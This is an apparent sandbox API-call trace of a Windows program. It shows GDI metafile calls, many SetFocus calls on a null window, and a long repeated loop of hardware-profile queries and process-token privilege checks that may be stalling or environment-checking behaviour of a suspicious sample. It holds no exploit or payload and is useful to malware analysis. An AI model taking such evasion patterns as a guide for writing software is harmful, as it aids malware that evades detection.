GetDeviceCaps (hdc=0x1, index=10) returned 0 [0084.610] GetEnhMetaFileA (lpName="emf") returned 0x0 [0084.613] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x6c, lpEnhMetaHeader=0x18ecc8 | out: lpEnhMetaHeader=0x18ecc8) returned 0x0 [0084.613] PlayEnhMetaFile (hdc=0x0, hmf=0x0, lprect=0x18f7b8) returned 0 [0084.614] DeleteEnhMetaFile (hmf=0x0) returned 0 [0084.614] GetSystemMenu (hWnd=0x0, bRevert=0) returned 0x0 [0084.614] EnableMenuItem (hMenu=0x0, uIDEnableItem=0xf060, uEnable=0x1) returned 1 [0084.614] SetFocus (hWnd=0x0) returned 0x0 [0084.614] SetFocus (hWnd=0x0) returned 0x0 [0084.614] SetFocus (hWnd=0x0) returned 0x0 [0084.614] SetFocus (hWnd=0x0) returned 0x0 [0084.614] SetFocus (hWnd=0x0) returned 0x0 [0084.614] SetFocus (hWnd=0x0) returned 0x0 [0084.614] SetFocus (hWnd=0x0) returned 0x0 [0084.614] SetFocus (hWnd=0x0) returned 0x0 [0084.614] SetFocus (hWnd=0x0) returned 0x0 [0084.614] SetFocus (hWnd=0x0) returned 0x0 [0084.614] SetFocus (hWnd=0x0) returned 0x0 [0084.614] SetFocus (hWnd=0x0) returned 0x0 [0084.614] SetFocus (hWnd=0x0) returned 0x0 [0084.614] SetFocus (hWnd=0x0) returned 0x0 [0084.614] SetFocus (hWnd=0x0) returned 0x0 [0084.614] SetFocus (hWnd=0x0) returned 0x0 [0084.614] SetFocus (hWnd=0x0) returned 0x0 [0084.614] SetFocus (hWnd=0x0) returned 0x0 [0084.614] SetFocus (hWnd=0x0) returned 0x0 [0084.614] SetFocus (hWnd=0x0) returned 0x0 [0084.614] SetFocus (hWnd=0x0) returned 0x0 [0084.614] SetFocus (hWnd=0x0) returned 0x0 [0084.614] SetFocus (hWnd=0x0) returned 0x0 [0084.614] SetFocus (hWnd=0x0) returned 0x0 [0084.614] SetFocus (hWnd=0x0) returned 0x0 [0084.614] SetFocus (hWnd=0x0) returned 0x0 [0084.614] SetFocus (hWnd=0x0) returned 0x0 [0084.614] SetFocus (hWnd=0x0) returned 0x0 [0084.614] SetFocus (hWnd=0x0) returned 0x0 [0084.614] SetFocus (hWnd=0x0) returned 0x0 [0084.614] SetFocus (hWnd=0x0) returned 0x0 [0084.614] SetFocus (hWnd=0x0) returned 0x0 [0084.614] SetFocus (hWnd=0x0) returned 0x0 [0084.614] SetFocus (hWnd=0x0) returned 0x0 [0084.614] SetFocus (hWnd=0x0) returned 0x0 [0084.614] SetFocus (hWnd=0x0) returned 0x0 [0084.614] SetFocus (hWnd=0x0) returned 0x0 [0084.614] SetFocus (hWnd=0x0) returned 0x0 [0084.614] SetFocus (hWnd=0x0) returned 0x0 [0084.615] SetFocus (hWnd=0x0) returned 0x0 [0084.615] SetFocus (hWnd=0x0) returned 0x0 [0084.615] SetFocus (hWnd=0x0) returned 0x0 [0084.615] SetFocus (hWnd=0x0) returned 0x0 [0084.615] SetFocus (hWnd=0x0) returned 0x0 [0084.615] SetFocus (hWnd=0x0) returned 0x0 [0084.615] SetFocus (hWnd=0x0) returned 0x0 [0084.615] SetFocus (hWnd=0x0) returned 0x0 [0084.615] SetFocus (hWnd=0x0) returned 0x0 [0084.615] SetFocus (hWnd=0x0) returned 0x0 [0084.615] SetFocus (hWnd=0x0) returned 0x0 [0084.615] SetFocus (hWnd=0x0) returned 0x0 [0084.615] SetFocus (hWnd=0x0) returned 0x0 [0084.615] GetModuleHandleA (lpModuleName="kernel32") returned 0x75ce0000 [0084.615] IsWindow (hWnd=0x0) returned 0 [0084.615] EnableMenuItem (hMenu=0x0, uIDEnableItem=0xc, uEnable=0x0) returned 1 [0084.615] SendMessageA (hWnd=0x0, Msg=0x405, wParam=0x0, lParam=0x0) returned 0x0 [0084.615] GetProcAddress (hModule=0x75ce0000, lpProcName="HeapCreate") returned 0x75cf4a2d [0084.615] SHGetMalloc (in: ppMalloc=0x18fe4c | out: ppMalloc=0x18fe4c*=0x764966bc) returned 0x0 [0084.616] SHGetDesktopFolder (in: ppshf=0x18fe48 | out: ppshf=0x18fe48*=0x391834) returned 0x0 [0084.647] IShellFolder:ParseDisplayName (in: This=0x391834, hwnd=0x0, pbc=0x0, pszDisplayName="", pchEaten=0x18f4a4*=0xf000e, ppidl=0x18fe40, pdwAttributes=0x18f4b8*=0x90008 | out: pchEaten=0x18f4a4*=0xf000e, ppidl=0x18fe40, pdwAttributes=0x18f4b8*=0x90008) returned 0x0 [0084.648] IUnknown:Release (This=0x391834) returned 0x0 [0084.648] IUnknown:AddRef (This=0x764966bc) returned 0x1 [0084.648] SendMessageA (hWnd=0x0, Msg=0xba, wParam=0x0, lParam=0x0) returned 0x0 [0084.648] SendMessageA (hWnd=0x0, Msg=0xc9, wParam=0xffffffff, lParam=0x0) returned 0x0 [0084.648] SendMessageA (hWnd=0x0, Msg=0xbb, wParam=0xffffffff, lParam=0x0) returned 0x0 [0084.648] SendMessageA (hWnd=0x0, Msg=0xb0, wParam=0x0, lParam=0x0) returned 0x0 [0084.649] SendDlgItemMessageA (hDlg=0x1, nIDDlgItem=159816832, Msg=0x401, wParam=0x2, lParam=0x18f3ac) returned 0x0 [0084.649] GetLastError () returned 0x578 [0084.649] SetLastError (dwErrCode=0x578) [0084.649] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.650] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.650] GetLastError () returned 0x578 [0084.650] SetLastError (dwErrCode=0x578) [0084.650] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.650] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.651] GetCurrentThread () returned 0xfffffffe [0084.652] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.652] GetLastError () returned 0x3f0 [0084.652] GetCurrentProcess () returned 0xffffffff [0084.652] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.652] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.652] SetLastError (dwErrCode=0x522) [0084.652] CloseHandle (hObject=0x114) returned 1 [0084.652] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.652] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.652] GetLastError () returned 0x578 [0084.652] SetLastError (dwErrCode=0x578) [0084.652] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.652] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.652] GetCurrentThread () returned 0xfffffffe [0084.652] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.652] GetLastError () returned 0x3f0 [0084.652] GetCurrentProcess () returned 0xffffffff [0084.652] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.652] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.652] SetLastError (dwErrCode=0x522) [0084.652] CloseHandle (hObject=0x114) returned 1 [0084.652] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.652] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.652] GetLastError () returned 0x578 [0084.652] SetLastError (dwErrCode=0x578) [0084.652] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.652] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.652] GetCurrentThread () returned 0xfffffffe [0084.652] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.652] GetLastError () returned 0x3f0 [0084.652] GetCurrentProcess () returned 0xffffffff [0084.652] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.652] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.652] SetLastError (dwErrCode=0x522) [0084.652] CloseHandle (hObject=0x114) returned 1 [0084.652] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.652] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.652] GetLastError () returned 0x578 [0084.653] SetLastError (dwErrCode=0x578) [0084.653] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.653] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.653] GetCurrentThread () returned 0xfffffffe [0084.653] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.653] GetLastError () returned 0x3f0 [0084.653] GetCurrentProcess () returned 0xffffffff [0084.653] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.653] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.653] SetLastError (dwErrCode=0x522) [0084.653] CloseHandle (hObject=0x114) returned 1 [0084.653] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.653] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.653] GetLastError () returned 0x578 [0084.653] SetLastError (dwErrCode=0x578) [0084.653] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.653] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.653] GetCurrentThread () returned 0xfffffffe [0084.653] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.653] GetLastError () returned 0x3f0 [0084.653] GetCurrentProcess () returned 0xffffffff [0084.653] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.653] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.653] SetLastError (dwErrCode=0x522) [0084.653] CloseHandle (hObject=0x114) returned 1 [0084.653] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.653] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.653] GetLastError () returned 0x578 [0084.653] SetLastError (dwErrCode=0x578) [0084.653] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.653] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.653] GetCurrentThread () returned 0xfffffffe [0084.653] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.653] GetLastError () returned 0x3f0 [0084.653] GetCurrentProcess () returned 0xffffffff [0084.653] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.653] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.653] SetLastError (dwErrCode=0x522) [0084.653] CloseHandle (hObject=0x114) returned 1 [0084.653] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.653] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.654] GetLastError () returned 0x578 [0084.654] SetLastError (dwErrCode=0x578) [0084.654] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.654] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.654] GetCurrentThread () returned 0xfffffffe [0084.654] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.654] GetLastError () returned 0x3f0 [0084.654] GetCurrentProcess () returned 0xffffffff [0084.654] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.654] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.654] SetLastError (dwErrCode=0x522) [0084.654] CloseHandle (hObject=0x114) returned 1 [0084.654] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.654] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.654] GetLastError () returned 0x578 [0084.654] SetLastError (dwErrCode=0x578) [0084.654] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.654] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.654] GetCurrentThread () returned 0xfffffffe [0084.654] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.654] GetLastError () returned 0x3f0 [0084.654] GetCurrentProcess () returned 0xffffffff [0084.654] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.654] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.654] SetLastError (dwErrCode=0x522) [0084.654] CloseHandle (hObject=0x114) returned 1 [0084.654] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.654] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.654] GetLastError () returned 0x578 [0084.654] SetLastError (dwErrCode=0x578) [0084.654] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.654] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.654] GetCurrentThread () returned 0xfffffffe [0084.654] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.654] GetLastError () returned 0x3f0 [0084.654] GetCurrentProcess () returned 0xffffffff [0084.654] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.654] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.654] SetLastError (dwErrCode=0x522) [0084.654] CloseHandle (hObject=0x114) returned 1 [0084.654] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.655] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.655] GetLastError () returned 0x578 [0084.655] SetLastError (dwErrCode=0x578) [0084.655] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.655] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.655] GetCurrentThread () returned 0xfffffffe [0084.655] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.655] GetLastError () returned 0x3f0 [0084.655] GetCurrentProcess () returned 0xffffffff [0084.655] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.655] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.655] SetLastError (dwErrCode=0x522) [0084.655] CloseHandle (hObject=0x114) returned 1 [0084.655] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.655] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.655] GetLastError () returned 0x578 [0084.655] SetLastError (dwErrCode=0x578) [0084.655] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.655] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.655] GetCurrentThread () returned 0xfffffffe [0084.655] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.655] GetLastError () returned 0x3f0 [0084.655] GetCurrentProcess () returned 0xffffffff [0084.655] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.655] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.655] SetLastError (dwErrCode=0x522) [0084.655] CloseHandle (hObject=0x114) returned 1 [0084.655] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.655] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.655] GetLastError () returned 0x578 [0084.655] SetLastError (dwErrCode=0x578) [0084.655] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.655] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.655] GetCurrentThread () returned 0xfffffffe [0084.655] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.655] GetLastError () returned 0x3f0 [0084.655] GetCurrentProcess () returned 0xffffffff [0084.655] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.655] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.655] SetLastError (dwErrCode=0x522) [0084.655] CloseHandle (hObject=0x114) returned 1 [0084.656] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.656] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.656] GetLastError () returned 0x578 [0084.656] SetLastError (dwErrCode=0x578) [0084.656] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.656] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.656] GetCurrentThread () returned 0xfffffffe [0084.656] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.656] GetLastError () returned 0x3f0 [0084.656] GetCurrentProcess () returned 0xffffffff [0084.656] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.656] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.656] SetLastError (dwErrCode=0x522) [0084.656] CloseHandle (hObject=0x114) returned 1 [0084.656] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.656] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.656] GetLastError () returned 0x578 [0084.656] SetLastError (dwErrCode=0x578) [0084.656] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.656] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.656] GetCurrentThread () returned 0xfffffffe [0084.656] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.656] GetLastError () returned 0x3f0 [0084.656] GetCurrentProcess () returned 0xffffffff [0084.656] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.656] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.656] SetLastError (dwErrCode=0x522) [0084.656] CloseHandle (hObject=0x114) returned 1 [0084.656] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.656] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.656] GetLastError () returned 0x578 [0084.656] SetLastError (dwErrCode=0x578) [0084.656] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.656] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.656] GetCurrentThread () returned 0xfffffffe [0084.656] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.656] GetLastError () returned 0x3f0 [0084.656] GetCurrentProcess () returned 0xffffffff [0084.656] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.656] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.656] SetLastError (dwErrCode=0x522) [0084.657] CloseHandle (hObject=0x114) returned 1 [0084.657] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.657] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.657] GetLastError () returned 0x578 [0084.657] SetLastError (dwErrCode=0x578) [0084.657] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.657] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.657] GetCurrentThread () returned 0xfffffffe [0084.657] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.657] GetLastError () returned 0x3f0 [0084.657] GetCurrentProcess () returned 0xffffffff [0084.657] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.657] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.657] SetLastError (dwErrCode=0x522) [0084.657] CloseHandle (hObject=0x114) returned 1 [0084.657] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.657] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.657] GetLastError () returned 0x578 [0084.657] SetLastError (dwErrCode=0x578) [0084.657] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.657] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.657] GetCurrentThread () returned 0xfffffffe [0084.657] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.657] GetLastError () returned 0x3f0 [0084.657] GetCurrentProcess () returned 0xffffffff [0084.657] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.657] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.657] SetLastError (dwErrCode=0x522) [0084.657] CloseHandle (hObject=0x114) returned 1 [0084.657] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.657] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.657] GetLastError () returned 0x578 [0084.657] SetLastError (dwErrCode=0x578) [0084.657] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.657] GetPriorityClass 